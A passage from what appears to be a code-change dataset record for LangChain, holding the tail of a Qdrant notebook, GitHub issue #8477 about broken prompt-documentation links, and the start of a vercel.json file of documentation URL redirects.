{\n", " \"foo\": \"bar\"\n", " }\n", "}\n", "```\n", "\n", "You can, however, decide to use different keys for the page content and metadata. That's useful if you already have a collection that you'd like to reuse." ], "metadata": { "collapsed": false }, "id": "b2350093" }, { "cell_type": "code", "execution_count": 19, "id": "e4d6baf9", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T11:08:31.739141Z", "start_time": "2023-04-04T11:08:30.229748Z" } }, "outputs": [ { "data": { "text/plain": [ "<langchain.vectorstores.qdrant.Qdrant at 0x7fc4e2baa230>" ] }, "execution_count": 19, "metadata": {}, "output_type": "execute_result" } ], "source": [ "Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " location=\":memory:\",\n", " collection_name=\"my_documents_2\",\n", " content_payload_key=\"my_page_content_key\",\n", " metadata_payload_key=\"my_meta\",\n", ")" ] }, { "cell_type": "code", "execution_count": null, "id": "2300e785", "metadata": {}, "outputs": [], "source": [] } ], "metadata": { "kernelspec": { "display_name": "Python 3 (ipykernel)", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.11.3" } }, "nbformat": 4, "nbformat_minor": 5 }
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,477
DOC: Broken Links in Prompts Sub Categories Pages
### Issue with current documentation: The INFO: Python Guide links in both https://docs.langchain.com/docs/components/prompts/prompt-template and https://docs.langchain.com/docs/components/prompts/example-selectors are both broken (similar to #8105) ### Idea or request for content: The pages have simply been moved from https://python.langchain.com/docs/modules/prompts/ to https://python.langchain.com/docs/modules/model_io/prompts/, so setting up corresponding redirects should fix it I can open up a PR with the corresponding redirects myself
https://github.com/langchain-ai/langchain/issues/8477
https://github.com/langchain-ai/langchain/pull/8478
08f5e6b8012f5eda2609103f33676199a3781a15
04ebdbe98f99624aa2adc42c9f622a9668967878
"2023-07-30T04:41:57Z"
python
"2023-07-31T02:38:52Z"
docs/docs_skeleton/vercel.json
{ "redirects": [ { "source": "/en/latest/additional_resources/youtube.html", "destination": "/docs/additional_resources/youtube" }, { "source": "/en/latest/integrations/agent_with_wandb_tracing.html", "destination": "/docs/integrations/providers/agent_with_wandb_tracing" }, { "source": "/docs/integrations/agent_with_wandb_tracing", "destination": "/docs/integrations/providers/agent_with_wandb_tracing" }, { "source": "/en/latest/integrations/ai21.html", "destination": "/docs/integrations/providers/ai21" }, { "source": "/docs/integrations/ai21", "destination": "/docs/integrations/providers/ai21" }, { "source": "/en/latest/integrations/aim_tracking.html", "destination": "/docs/integrations/providers/aim_tracking" }, { "source": "/docs/integrations/aim_tracking", "destination": "/docs/integrations/providers/aim_tracking" }, { "source": "/en/latest/integrations/airbyte.html", "destination": "/docs/integrations/providers/airbyte" }, { "source": "/docs/integrations/airbyte", "destination": "/docs/integrations/providers/airbyte" }, { "source": "/en/latest/integrations/aleph_alpha.html", "destination": "/docs/integrations/providers/aleph_alpha" }, { "source": "/docs/integrations/aleph_alpha", "destination": "/docs/integrations/providers/aleph_alpha" }, { "source": "/en/latest/integrations/analyticdb.html", "destination": "/docs/integrations/providers/analyticdb" }, { "source": "/docs/integrations/analyticdb", "destination": "/docs/integrations/providers/analyticdb" }, { "source": "/en/latest/integrations/annoy.html", "destination": "/docs/integrations/providers/annoy" }, { "source": "/docs/integrations/annoy", "destination": "/docs/integrations/providers/annoy" }, { "source": "/en/latest/integrations/anyscale.html", "destination": "/docs/integrations/providers/anyscale" }, { "source": "/docs/integrations/anyscale", "destination": "/docs/integrations/providers/anyscale" }, { "source": "/en/latest/integrations/apify.html", "destination": "/docs/integrations/providers/apify" }, { "source": "/docs/integrations/apify", "destination": "/docs/integrations/providers/apify" }, { "source": "/en/latest/integrations/argilla.html", "destination": "/docs/integrations/providers/argilla" }, { "source": "/docs/integrations/argilla", "destination": "/docs/integrations/providers/argilla" }, { "source": "/en/latest/integrations/arxiv.html", "destination": "/docs/integrations/providers/arxiv" }, { "source": "/docs/integrations/arxiv", "destination": "/docs/integrations/providers/arxiv" }, { "source": "/en/latest/integrations/atlas.html", "destination": "/docs/integrations/providers/atlas" }, { "source": "/docs/integrations/atlas", "destination": "/docs/integrations/providers/atlas" }, { "source": "/en/latest/integrations/awadb.html", "destination": "/docs/integrations/providers/awadb" }, { "source": "/docs/integrations/awadb", "destination": "/docs/integrations/providers/awadb" }, { "source": "/en/latest/integrations/aws_s3.html", "destination": "/docs/integrations/providers/aws_s3" }, { "source": "/docs/integrations/aws_s3", "destination": "/docs/integrations/providers/aws_s3" }, { "source": "/en/latest/integrations/azlyrics.html", "destination": "/docs/integrations/providers/azlyrics" }, { "source": "/docs/integrations/azlyrics", "destination": "/docs/integrations/providers/azlyrics" }, { "source": "/en/latest/integrations/azure_blob_storage.html", "destination": "/docs/integrations/providers/azure_blob_storage" }, { "source": "/docs/integrations/azure_blob_storage", "destination": "/docs/integrations/providers/azure_blob_storage" }, { "source": "/en/latest/integrations/azure_cognitive_search_.html", "destination": "/docs/integrations/providers/azure_cognitive_search_" }, { "source": "/docs/integrations/azure_cognitive_search_", "destination": "/docs/integrations/providers/azure_cognitive_search_" }, { "source": "/en/latest/integrations/azure_openai.html", "destination": "/docs/integrations/providers/azure_openai" }, { "source": "/docs/integrations/azure_openai", "destination": "/docs/integrations/providers/azure_openai" }, { "source": "/en/latest/integrations/bananadev.html", "destination": "/docs/integrations/providers/bananadev" }, { "source": "/docs/integrations/bananadev", "destination": "/docs/integrations/providers/bananadev" }, { "source": "/en/latest/ecosystem/baseten.html", "destination": "/docs/integrations/providers/baseten" }, { "source": "/docs/integrations/baseten", "destination": "/docs/integrations/providers/baseten" }, { "source": "/en/latest/integrations/beam.html", "destination": "/docs/integrations/providers/beam" }, { "source": "/docs/integrations/beam", "destination": "/docs/integrations/providers/beam" }, { "source": "/en/latest/integrations/amazon_bedrock.html", "destination": "/docs/integrations/providers/bedrock" }, { "source": "/docs/integrations/bedrock", "destination": "/docs/integrations/providers/bedrock" }, { "source": "/en/latest/integrations/bilibili.html", "destination": "/docs/integrations/providers/bilibili" }, { "source": "/docs/integrations/bilibili", "destination": "/docs/integrations/providers/bilibili" }, { "source": "/en/latest/integrations/blackboard.html", "destination": "/docs/integrations/providers/blackboard" }, { "source": "/docs/integrations/blackboard", "destination": "/docs/integrations/providers/blackboard" }, { "source": "/en/latest/integrations/cassandra.html", "destination": "/docs/integrations/providers/cassandra" }, { "source": "/docs/integrations/cassandra", "destination": "/docs/integrations/providers/cassandra" }, { "source": "/en/latest/integrations/cerebriumai.html", "destination": "/docs/integrations/providers/cerebriumai" }, { "source": "/docs/integrations/cerebriumai", "destination": "/docs/integrations/providers/cerebriumai" }, { "source": "/en/latest/integrations/chroma.html", "destination": "/docs/integrations/providers/chroma" }, { "source": "/docs/integrations/chroma", "destination": "/docs/integrations/providers/chroma" }, { "source": "/en/latest/integrations/clearml_tracking.html", "destination": "/docs/integrations/providers/clearml_tracking" }, { "source": "/docs/integrations/clearml_tracking", "destination": "/docs/integrations/providers/clearml_tracking" }, { "source": "/en/latest/integrations/cohere.html", "destination": "/docs/integrations/providers/cohere" }, { "source": "/docs/integrations/cohere", "destination": "/docs/integrations/providers/cohere" }, { "source": "/en/latest/integrations/college_confidential.html", "destination": "/docs/integrations/providers/college_confidential" }, { "source": "/docs/integrations/college_confidential", "destination": "/docs/integrations/providers/college_confidential" }, { "source": "/en/latest/integrations/comet_tracking.html", "destination": "/docs/integrations/providers/comet_tracking" }, { "source": "/docs/integrations/comet_tracking", "destination": "/docs/integrations/providers/comet_tracking" }, { "source": "/en/latest/integrations/confluence.html", "destination": "/docs/integrations/providers/confluence" }, { "source": "/docs/integrations/confluence", "destination": "/docs/integrations/providers/confluence" }, { "source": "/en/latest/integrations/ctransformers.html", "destination": "/docs/integrations/providers/ctransformers" }, { "source": "/docs/integrations/ctransformers", "destination": "/docs/integrations/providers/ctransformers" }, { "source": "/en/latest/integrations/databerry.html", "destination": "/docs/integrations/providers/chaindesk" }, { "source": "/docs/integrations/chaindesk", "destination": "/docs/integrations/providers/chaindesk" }, { "source": "/docs/integrations/databerry", "destination": "/docs/integrations/providers/chaindesk" }, { "source": "/docs/integrations/chaindesk", "destination": "/docs/integrations/providers/chaindesk" }, { "source": "/en/latest/integrations/databricks/databricks.html", "destination": "/docs/integrations/providers/databricks" }, { "source": "/docs/integrations/databricks", "destination": "/docs/integrations/providers/databricks" }, { "source": "/en/latest/integrations/databricks.html", "destination": "/docs/integrations/providers/databricks" }, { "source": "/docs/integrations/databricks", "destination": "/docs/integrations/providers/databricks" }, { "source": "/en/latest/integrations/deepinfra.html", "destination": "/docs/integrations/providers/deepinfra" }, { "source": "/docs/integrations/deepinfra", "destination": "/docs/integrations/providers/deepinfra" }, { "source": "/en/latest/integrations/deeplake.html", "destination": "/docs/integrations/providers/deeplake" }, { "source": "/docs/integrations/deeplake", "destination": "/docs/integrations/providers/deeplake" }, { "source": "/en/latest/integrations/diffbot.html", "destination": "/docs/integrations/providers/diffbot" }, { "source": "/docs/integrations/diffbot", "destination": "/docs/integrations/providers/diffbot" }, { "source": "/en/latest/integrations/discord.html", "destination": "/docs/integrations/providers/discord" }, { "source": "/docs/integrations/discord", "destination": "/docs/integrations/providers/discord" }, { "source": "/en/latest/integrations/docugami.html", "destination": "/docs/integrations/providers/docugami" }, { "source": "/docs/integrations/docugami", "destination": "/docs/integrations/providers/docugami" }, { "source": "/en/latest/integrations/duckdb.html", "destination": "/docs/integrations/providers/duckdb" }, { "source": "/docs/integrations/duckdb", "destination": "/docs/integrations/providers/duckdb" }, { "source": "/en/latest/integrations/elasticsearch.html", "destination": "/docs/integrations/providers/elasticsearch" }, { "source": "/docs/integrations/elasticsearch", "destination": "/docs/integrations/providers/elasticsearch" }, { "source": "/en/latest/integrations/evernote.html", "destination": "/docs/integrations/providers/evernote" }, { "source": "/docs/integrations/evernote", "destination": "/docs/integrations/providers/evernote" }, { "source": "/en/latest/integrations/facebook_chat.html", "destination": "/docs/integrations/providers/facebook_chat" }, { "source": "/docs/integrations/facebook_chat", "destination": "/docs/integrations/providers/facebook_chat" }, { "source": "/en/latest/integrations/figma.html", "destination": "/docs/integrations/providers/figma" }, { "source": "/docs/integrations/figma", "destination": "/docs/integrations/providers/figma" }, { "source": "/en/latest/integrations/forefrontai.html", "destination": "/docs/integrations/providers/forefrontai" }, { "source": "/docs/integrations/forefrontai", "destination": "/docs/integrations/providers/forefrontai" }, { "source": "/en/latest/integrations/git.html", "destination": "/docs/integrations/providers/git" }, { "source": "/docs/integrations/git", "destination": "/docs/integrations/providers/git" }, { "source": "/en/latest/integrations/gitbook.html", "destination": "/docs/integrations/providers/gitbook" }, { "source": "/docs/integrations/gitbook", "destination": "/docs/integrations/providers/gitbook" }, { "source": "/en/latest/integrations/google_bigquery.html", "destination": "/docs/integrations/providers/google_bigquery" }, { "source": "/docs/integrations/google_bigquery", "destination": "/docs/integrations/providers/google_bigquery" }, { "source": "/en/latest/integrations/google_cloud_storage.html", "destination": "/docs/integrations/providers/google_cloud_storage" }, { "source": "/docs/integrations/google_cloud_storage", "destination": "/docs/integrations/providers/google_cloud_storage" }, { "source": "/en/latest/integrations/google_drive.html", "destination": "/docs/integrations/providers/google_drive" }, { "source": "/docs/integrations/google_drive", "destination": "/docs/integrations/providers/google_drive" }, { "source": "/en/latest/integrations/google_search.html", "destination": "/docs/integrations/providers/google_search" }, { "source": "/docs/integrations/google_search", "destination": "/docs/integrations/providers/google_search" }, { "source": "/en/latest/integrations/google_serper.html", "destination": "/docs/integrations/providers/google_serper" }, { "source": "/docs/integrations/google_serper", "destination": "/docs/integrations/providers/google_serper" }, { "source": "/en/latest/integrations/gooseai.html", "destination": "/docs/integrations/providers/gooseai" }, { "source": "/docs/integrations/gooseai", "destination": "/docs/integrations/providers/gooseai" }, { "source": "/en/latest/integrations/gpt4all.html", "destination": "/docs/integrations/providers/gpt4all" }, { "source": "/docs/integrations/gpt4all", "destination": "/docs/integrations/providers/gpt4all" }, { "source": "/en/latest/integrations/graphsignal.html", "destination": "/docs/integrations/providers/graphsignal" }, { "source": "/docs/integrations/graphsignal", "destination": "/docs/integrations/providers/graphsignal" }, { "source": "/en/latest/integrations/gutenberg.html", "destination": "/docs/integrations/providers/gutenberg" }, { "source": "/docs/integrations/gutenberg", "destination": "/docs/integrations/providers/gutenberg" }, { "source": "/en/latest/integrations/hacker_news.html", "destination": "/docs/integrations/providers/hacker_news" }, { "source": "/docs/integrations/hacker_news", "destination": "/docs/integrations/providers/hacker_news" }, { "source": "/en/latest/integrations/hazy_research.html", "destination": "/docs/integrations/providers/hazy_research" }, { "source": "/docs/integrations/hazy_research", "destination": "/docs/integrations/providers/hazy_research" }, { "source": "/en/latest/integrations/helicone.html", "destination": "/docs/integrations/providers/helicone" }, { "source": "/docs/integrations/helicone", "destination": "/docs/integrations/providers/helicone" }, { "source": "/en/latest/integrations/huggingface.html", "destination": "/docs/integrations/providers/huggingface" }, { "source": "/docs/integrations/huggingface", "destination": "/docs/integrations/providers/huggingface" }, { "source": "/en/latest/integrations/ifixit.html", "destination": "/docs/integrations/providers/ifixit" }, { "source": "/docs/integrations/ifixit", "destination": "/docs/integrations/providers/ifixit" }, { "source": "/en/latest/integrations/imsdb.html", "destination": "/docs/integrations/providers/imsdb" }, { "source": "/docs/integrations/imsdb", "destination": "/docs/integrations/providers/imsdb" }, { "source": "/en/latest/integrations/jina.html", "destination": "/docs/integrations/providers/jina" }, { "source": "/docs/integrations/jina", "destination": "/docs/integrations/providers/jina" }, { "source": "/en/latest/integrations/lancedb.html", "destination": "/docs/integrations/providers/lancedb" }, { "source": "/docs/integrations/lancedb", "destination": "/docs/integrations/providers/lancedb" }, { "source": "/en/latest/integrations/langchain_decorators.html", "destination": "/docs/integrations/providers/langchain_decorators" }, { "source": "/docs/integrations/langchain_decorators", "destination": "/docs/integrations/providers/langchain_decorators" }, { "source": "/en/latest/integrations/llamacpp.html", "destination": "/docs/integrations/providers/llamacpp" }, { "source": "/docs/integrations/llamacpp", "destination": "/docs/integrations/providers/llamacpp" }, { "source": "/en/latest/integrations/mediawikidump.html", "destination": "/docs/integrations/providers/mediawikidump" }, { "source": "/docs/integrations/mediawikidump", "destination": "/docs/integrations/providers/mediawikidump" }, { "source": "/en/latest/integrations/metal.html", "destination": "/docs/integrations/providers/metal" }, { "source": "/docs/integrations/metal", "destination": "/docs/integrations/providers/metal" }, { "source": "/en/latest/integrations/microsoft_onedrive.html", "destination": "/docs/integrations/providers/microsoft_onedrive" }, { "source": "/docs/integrations/microsoft_onedrive", "destination": "/docs/integrations/providers/microsoft_onedrive" }, { "source": "/en/latest/integrations/microsoft_powerpoint.html", "destination": "/docs/integrations/providers/microsoft_powerpoint" }, { "source": "/docs/integrations/microsoft_powerpoint", "destination": "/docs/integrations/providers/microsoft_powerpoint" }, { "source": "/en/latest/integrations/microsoft_word.html", "destination": "/docs/integrations/providers/microsoft_word" }, { "source": "/docs/integrations/microsoft_word", "destination": "/docs/integrations/providers/microsoft_word" }, { "source": "/en/latest/integrations/milvus.html", "destination": "/docs/integrations/providers/milvus" }, { "source": "/docs/integrations/milvus", "destination": "/docs/integrations/providers/milvus" }, { "source": "/en/latest/integrations/mlflow_tracking.html", "destination": "/docs/integrations/providers/mlflow_tracking" }, { "source": "/docs/integrations/mlflow_tracking", "destination": "/docs/integrations/providers/mlflow_tracking" }, { "source": "/en/latest/integrations/modal.html", "destination": "/docs/integrations/providers/modal" }, { "source": "/docs/integrations/modal", "destination": "/docs/integrations/providers/modal" }, { "source": "/en/latest/ecosystem/modelscope.html", "destination": "/docs/integrations/providers/modelscope" }, { "source": "/docs/integrations/modelscope", "destination": "/docs/integrations/providers/modelscope" }, { "source": "/en/latest/integrations/modern_treasury.html", "destination": "/docs/integrations/providers/modern_treasury" }, { "source": "/docs/integrations/modern_treasury", "destination": "/docs/integrations/providers/modern_treasury" }, { "source": "/en/latest/integrations/momento.html", "destination": "/docs/integrations/providers/momento" }, { "source": "/docs/integrations/momento", "destination": "/docs/integrations/providers/momento" }, { "source": "/en/latest/integrations/myscale.html", "destination": "/docs/integrations/providers/myscale" }, { "source": "/docs/integrations/myscale", "destination": "/docs/integrations/providers/myscale" }, { "source": "/en/latest/integrations/nlpcloud.html", "destination": "/docs/integrations/providers/nlpcloud" }, { "source": "/docs/integrations/nlpcloud", "destination": "/docs/integrations/providers/nlpcloud" }, { "source": "/en/latest/integrations/notion.html", "destination": "/docs/integrations/providers/notion" }, { "source": "/docs/integrations/notion", "destination": "/docs/integrations/providers/notion" }, { "source": "/en/latest/integrations/obsidian.html", "destination": "/docs/integrations/providers/obsidian" }, { "source": "/docs/integrations/obsidian", "destination": "/docs/integrations/providers/obsidian" }, { "source": "/en/latest/integrations/openai.html", "destination": "/docs/integrations/providers/openai" }, { "source": "/docs/integrations/openai", "destination": "/docs/integrations/providers/openai" }, { "source": "/en/latest/integrations/opensearch.html", "destination": "/docs/integrations/providers/opensearch" }, { "source": "/docs/integrations/opensearch", "destination": "/docs/integrations/providers/opensearch" }, { "source": "/en/latest/integrations/openweathermap.html", "destination": "/docs/integrations/providers/openweathermap" }, { "source": "/docs/integrations/openweathermap", "destination": "/docs/integrations/providers/openweathermap" }, { "source": "/en/latest/integrations/petals.html", "destination": "/docs/integrations/providers/petals" }, { "source": "/docs/integrations/petals", "destination": "/docs/integrations/providers/petals" }, { "source": "/en/latest/integrations/pgvector.html", "destination": "/docs/integrations/providers/pgvector" }, { "source": "/docs/integrations/pgvector", "destination": "/docs/integrations/providers/pgvector" }, { "source": "/en/latest/integrations/pinecone.html", "destination": "/docs/integrations/providers/pinecone" }, { "source": "/docs/integrations/pinecone", "destination": "/docs/integrations/providers/pinecone" }, { "source": "/en/latest/integrations/pipelineai.html", "destination": "/docs/integrations/providers/pipelineai" }, { "source": "/docs/integrations/pipelineai", "destination": "/docs/integrations/providers/pipelineai" }, { "source": "/en/latest/integrations/predictionguard.html", "destination": "/docs/integrations/providers/predictionguard" }, { "source": "/docs/integrations/predictionguard", "destination": "/docs/integrations/providers/predictionguard" }, { "source": "/en/latest/integrations/promptlayer.html", "destination": "/docs/integrations/providers/promptlayer" }, { "source": "/docs/integrations/promptlayer", "destination": "/docs/integrations/providers/promptlayer" }, { "source": "/en/latest/integrations/psychic.html", "destination": "/docs/integrations/providers/psychic" }, { "source": "/docs/integrations/psychic", "destination": "/docs/integrations/providers/psychic" }, { "source": "/en/latest/integrations/qdrant.html", "destination": "/docs/integrations/providers/qdrant" }, { "source": "/docs/integrations/qdrant", "destination": "/docs/integrations/providers/qdrant" }, { "source": "/en/latest/integrations/ray_serve.html", "destination": "/docs/integrations/providers/ray_serve" }, { "source": "/docs/integrations/ray_serve", "destination": "/docs/integrations/providers/ray_serve" }, { "source": "/en/latest/integrations/rebuff.html", "destination": "/docs/integrations/providers/rebuff" }, { "source": "/docs/integrations/rebuff", "destination": "/docs/integrations/providers/rebuff" }, { "source": "/en/latest/integrations/reddit.html", "destination": "/docs/integrations/providers/reddit" }, { "source": "/docs/integrations/reddit", "destination": "/docs/integrations/providers/reddit" }, { "source": "/en/latest/integrations/redis.html", "destination": "/docs/integrations/providers/redis" }, { "source": "/docs/integrations/redis", "destination": "/docs/integrations/providers/redis" }, { "source": "/en/latest/integrations/replicate.html", "destination": "/docs/integrations/providers/replicate" }, { "source": "/docs/integrations/replicate", "destination": "/docs/integrations/providers/replicate" }, { "source": "/en/latest/integrations/roam.html", "destination": "/docs/integrations/providers/roam" }, { "source": "/docs/integrations/roam", "destination": "/docs/integrations/providers/roam" }, { "source": "/en/latest/integrations/runhouse.html", "destination": "/docs/integrations/providers/runhouse" }, { "source": "/docs/integrations/runhouse", "destination": "/docs/integrations/providers/runhouse" }, { "source": "/en/latest/integrations/rwkv.html", "destination": "/docs/integrations/providers/rwkv" }, { "source": "/docs/integrations/rwkv", "destination": "/docs/integrations/providers/rwkv" }, { "source": "/en/latest/integrations/sagemaker_endpoint.html", "destination": "/docs/integrations/providers/sagemaker_endpoint" }, { "source": "/docs/integrations/sagemaker_endpoint", "destination": "/docs/integrations/providers/sagemaker_endpoint" }, { "source": "/en/latest/integrations/searx.html", "destination": "/docs/integrations/providers/searx" }, { "source": "/docs/integrations/searx", "destination": "/docs/integrations/providers/searx" }, { "source": "/en/latest/integrations/serpapi.html", "destination": "/docs/integrations/providers/serpapi" }, { "source": "/docs/integrations/serpapi", "destination": "/docs/integrations/providers/serpapi" }, { "source": "/en/latest/integrations/shaleprotocol.html", "destination": "/docs/integrations/providers/shaleprotocol" }, { "source": "/docs/integrations/shaleprotocol", "destination": "/docs/integrations/providers/shaleprotocol" }, { "source": "/en/latest/integrations/sklearn.html", "destination": "/docs/integrations/providers/sklearn" }, { "source": "/docs/integrations/sklearn", "destination": "/docs/integrations/providers/sklearn" }, { "source": "/en/latest/integrations/slack.html", "destination": "/docs/integrations/providers/slack" }, { "source": "/docs/integrations/slack", "destination": "/docs/integrations/providers/slack" }, { "source": "/en/latest/integrations/spacy.html", "destination": "/docs/integrations/providers/spacy" }, { "source": "/docs/integrations/spacy", "destination": "/docs/integrations/providers/spacy" }, { "source": "/en/latest/integrations/spreedly.html", "destination": "/docs/integrations/providers/spreedly" }, { "source": "/docs/integrations/spreedly", "destination": "/docs/integrations/providers/spreedly" }, { "source": "/en/latest/integrations/stochasticai.html", "destination": "/docs/integrations/providers/stochasticai" }, { "source": "/docs/integrations/stochasticai", "destination": "/docs/integrations/providers/stochasticai" }, { "source": "/en/latest/integrations/stripe.html", "destination": "/docs/integrations/providers/stripe" }, { "source": "/docs/integrations/stripe", "destination": "/docs/integrations/providers/stripe" }, { "source": "/en/latest/integrations/tair.html", "destination": "/docs/integrations/providers/tair" }, { "source": "/docs/integrations/tair", "destination": "/docs/integrations/providers/tair" }, { "source": "/en/latest/integrations/telegram.html", "destination": "/docs/integrations/providers/telegram" }, { "source": "/docs/integrations/telegram", "destination": "/docs/integrations/providers/telegram" }, { "source": "/en/latest/integrations/tomarkdown.html", "destination": "/docs/integrations/providers/tomarkdown" }, { "source": "/docs/integrations/tomarkdown", "destination": "/docs/integrations/providers/tomarkdown" }, { "source": "/en/latest/integrations/trello.html", "destination": "/docs/integrations/providers/trello" }, { "source": "/docs/integrations/trello", "destination": "/docs/integrations/providers/trello" }, { "source": "/en/latest/integrations/twitter.html", "destination": "/docs/integrations/providers/twitter" }, { "source": "/docs/integrations/twitter", "destination": "/docs/integrations/providers/twitter" }, { "source": "/en/latest/integrations/unstructured.html", "destination": "/docs/integrations/providers/unstructured" }, { "source": "/docs/integrations/unstructured", "destination": "/docs/integrations/providers/unstructured" }, { "source": "/en/latest/integrations/vectara/vectara_chat.html", "destination": "/docs/integrations/providers/vectara_chat" }, { "source": "/docs/integrations/vectara/vectara_chat", "destination": "/docs/integrations/providers/vectara_chat" }, { "source": "/en/latest/integrations/vectara/vectara_text_generation.html", "destination": "/docs/integrations/providers/vectara_text_generation" }, { "source": "/docs/integrations/vectara/vectara_text_generation", "destination": "/docs/integrations/providers/vectara_text_generation" }, { "source": "/en/latest/integrations/vespa.html", "destination": "/docs/integrations/providers/vespa" }, { "source": "/docs/integrations/vespa", "destination": "/docs/integrations/providers/vespa" }, { "source": "/en/latest/integrations/wandb_tracking.html", "destination": "/docs/integrations/providers/wandb_tracking" }, { "source": "/docs/integrations/wandb_tracking", "destination": "/docs/integrations/providers/wandb_tracking" }, { "source": "/en/latest/integrations/weather.html", "destination": "/docs/integrations/providers/weather" }, { "source": "/docs/integrations/weather", "destination": "/docs/integrations/providers/weather" }, { "source": "/en/latest/integrations/weaviate.html", "destination": "/docs/integrations/providers/weaviate" }, { "source": "/docs/integrations/weaviate", "destination": "/docs/integrations/providers/weaviate" }, { "source": "/en/latest/integrations/whatsapp.html", "destination": "/docs/integrations/providers/whatsapp" }, { "source": "/docs/integrations/whatsapp", "destination": "/docs/integrations/providers/whatsapp" }, { "source": "/en/latest/integrations/whylabs_profiling.html", "destination": "/docs/integrations/providers/whylabs_profiling" }, { "source": "/docs/integrations/whylabs_profiling", "destination": "/docs/integrations/providers/whylabs_profiling" }, { "source": "/en/latest/integrations/wikipedia.html", "destination": "/docs/integrations/providers/wikipedia" }, { "source": "/docs/integrations/wikipedia", "destination": "/docs/integrations/providers/wikipedia" }, { "source": "/en/latest/integrations/wolfram_alpha.html", "destination": "/docs/integrations/providers/wolfram_alpha" }, { "source": "/docs/integrations/wolfram_alpha", "destination": "/docs/integrations/providers/wolfram_alpha" }, { "source": "/en/latest/integrations/writer.html", "destination": "/docs/integrations/providers/writer" }, { "source": "/docs/integrations/writer", "destination": "/docs/integrations/providers/writer" }, { "source": "/en/latest/integrations/yeagerai.html", "destination": "/docs/integrations/providers/yeagerai" }, { "source": "/docs/integrations/yeagerai", "destination": "/docs/integrations/providers/yeagerai" }, { "source": "/en/latest/integrations/youtube.html", "destination": "/docs/integrations/providers/youtube" }, { "source": "/docs/integrations/youtube", "destination": "/docs/integrations/providers/youtube" }, { "source": "/en/latest/integrations/zep.html", "destination": "/docs/integrations/providers/zep" }, { "source": "/docs/integrations/zep", "destination": "/docs/integrations/providers/zep" }, { "source": "/en/latest/integrations/zilliz.html", "destination": "/docs/integrations/providers/zilliz" }, { "source": "/docs/integrations/zilliz", "destination": "/docs/integrations/providers/zilliz" }, { "source": "/docs/ecosystem/integrations/", "destination": "/docs/integrations/" }, { "source": "/docs/ecosystem/integrations/:path*", "destination": "/docs/integrations/providers/:path*" }, { "source": "/en/latest/ecosystem/deployments.html", "destination": "/docs/guides/deployments/template_repos" }, { "source": "/en/latest/use_cases/evaluation/agent_benchmarking.html", "destination": "/docs/guides/evaluation/agent_benchmarking" }, { "source": "/en/latest/use_cases/evaluation/agent_vectordb_sota_pg.html", "destination": "/docs/guides/evaluation/agent_vectordb_sota_pg" }, { "source": "/en/latest/use_cases/evaluation/benchmarking_template.html", "destination": "/docs/guides/evaluation/benchmarking_template" }, { "source": "/en/latest/use_cases/evaluation/data_augmented_question_answering.html", "destination": "/docs/guides/evaluation/data_augmented_question_answering" }, { "source": "/en/latest/use_cases/evaluation/generic_agent_evaluation.html", "destination": "/docs/guides/evaluation/generic_agent_evaluation" }, { "source": "/en/latest/use_cases/evaluation/huggingface_datasets.html", "destination": "/docs/guides/evaluation/huggingface_datasets" }, { "source": "/en/latest/use_cases/evaluation/llm_math.html", "destination": "/docs/guides/evaluation/llm_math" }, { "source": "/en/latest/use_cases/evaluation/openapi_eval.html", "destination": "/docs/guides/evaluation/openapi_eval" }, { "source": "/en/latest/use_cases/evaluation/qa_benchmarking_pg.html", "destination": "/docs/guides/evaluation/qa_benchmarking_pg" }, { "source": "/en/latest/use_cases/evaluation/qa_benchmarking_sota.html", "destination": "/docs/guides/evaluation/qa_benchmarking_sota" }, { "source": "/en/latest/use_cases/evaluation/qa_generation.html", "destination": "/docs/guides/evaluation/qa_generation" }, { "source": "/en/latest/use_cases/evaluation/question_answering.html", "destination": "/docs/guides/evaluation/question_answering" }, { "source": "/en/latest/use_cases/evaluation/sql_qa_benchmarking_chinook.html", "destination": "/docs/guides/evaluation/sql_qa_benchmarking_chinook" }, { "source": "/en/latest/additional_resources/model_laboratory.html", "destination": "/docs/guides/model_laboratory" }, { "source": "/en/latest/modules/agents/agents/examples/openai_functions_agent.html", "destination": "/docs/modules/agents/agent_types/openai_functions_agent" }, { "source": "/en/latest/modules/agents/agents/examples/react.html", "destination": "/docs/modules/agents/agent_types/react_docstore" }, { "source": "/en/latest/modules/agents/agents/examples/self_ask_with_search.html", "destination": "/docs/modules/agents/agent_types/self_ask_with_search" }, { "source": "/en/latest/modules/agents/agent_executors/examples/agent_vectorstore.html", "destination": "/docs/modules/agents/how_to/agent_vectorstore" }, { "source": "/en/latest/modules/agents/agent_executors/examples/async_agent.html", "destination": "/docs/modules/agents/how_to/async_agent" }, { "source": "/en/latest/modules/agents/agent_executors/examples/chatgpt_clone.html", "destination": "/docs/modules/agents/how_to/chatgpt_clone" }, { "source": "/en/latest/modules/agents/agents/custom_agent.html", "destination": "/docs/modules/agents/how_to/custom_agent" }, { "source": "/en/latest/modules/agents/agents/custom_agent_with_tool_retrieval.html", "destination": "/docs/modules/agents/how_to/custom_agent_with_tool_retrieval" }, { "source": "/en/latest/modules/agents/agents/custom_mrkl_agent.html", "destination": "/docs/modules/agents/how_to/custom_mrkl_agent" }, { "source": "/en/latest/modules/agents/agents/custom_multi_action_agent.html", "destination": "/docs/modules/agents/how_to/custom_multi_action_agent" }, { "source": "/en/latest/modules/agents/agent_executors/examples/handle_parsing_errors.html", "destination": "/docs/modules/agents/how_to/handle_parsing_errors" }, { "source": "/en/latest/modules/agents/agent_executors/examples/intermediate_steps.html", "destination": "/docs/modules/agents/how_to/intermediate_steps" }, { "source": "/en/latest/modules/agents/agent_executors/examples/max_iterations.html", "destination": "/docs/modules/agents/how_to/max_iterations" }, { "source": "/en/latest/modules/agents/agent_executors/examples/max_time_limit.html", "destination": "/docs/modules/agents/how_to/max_time_limit" }, { "source": "/en/latest/modules/agents/agent_executors/examples/sharedmemory_for_tools.html", "destination": "/docs/modules/agents/how_to/sharedmemory_for_tools" }, { "source": "/en/latest/modules/agents/streaming_stdout_final_only.html", "destination": "/docs/modules/agents/how_to/streaming_stdout_final_only" }, { "source": "/en/latest/modules/agents/toolkits/examples/azure_cognitive_services.html", "destination": "/docs/integrations/toolkits/azure_cognitive_services" }, { "source": "/docs/modules/agents/toolkits/azure_cognitive_services", "destination": "/docs/integrations/toolkits/azure_cognitive_services" }, { "source": "/en/latest/modules/agents/toolkits/examples/csv.html", "destination": 